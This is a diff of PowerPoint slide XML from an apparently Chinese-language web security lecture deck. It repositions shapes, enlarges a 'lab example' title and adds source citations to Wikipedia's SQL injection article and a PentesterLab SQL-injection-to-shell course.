         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -11205,7 +11334,12 @@
             <p:ph sz="quarter" idx="13"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="1849961"/>
+            <a:ext cx="10363826" cy="3424107"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit lnSpcReduction="10000"/>
@@ -11277,6 +11411,129 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6307228" y="5736608"/>
+            <a:ext cx="4661854" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>资料</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>来源：</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>维基</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>百科（中文版） </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> injection]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>	</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1">
+                  <a:lumMod val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11322,7 +11579,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="254657"/>
+            <a:off x="859183" y="0"/>
             <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
@@ -11354,7 +11611,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="1520328"/>
+            <a:off x="722705" y="1109282"/>
             <a:ext cx="10363826" cy="4825388"/>
           </a:xfrm>
         </p:spPr>
@@ -11621,6 +11878,89 @@
               <a:t>+XSS</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="722705" y="5934670"/>
+            <a:ext cx="5184433" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>资料</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>来源：</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> [WIKIPEDIA SQL injection]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>	https://en.wikipedia.org/wiki/SQL_injection</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1">
+                  <a:lumMod val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11895,7 +12235,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="804593" y="2420021"/>
+            <a:off x="695411" y="2037884"/>
             <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
@@ -11906,10 +12246,114 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
               <a:t>实验举例</a:t>
             </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="文本框 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2661313" y="4016198"/>
+            <a:ext cx="8378960" cy="984885"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>实验过程参考自：</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>pentesterlab</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> course]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>	https</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>://pentesterlab.com/exercises/from_sqli_to_shell/course</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
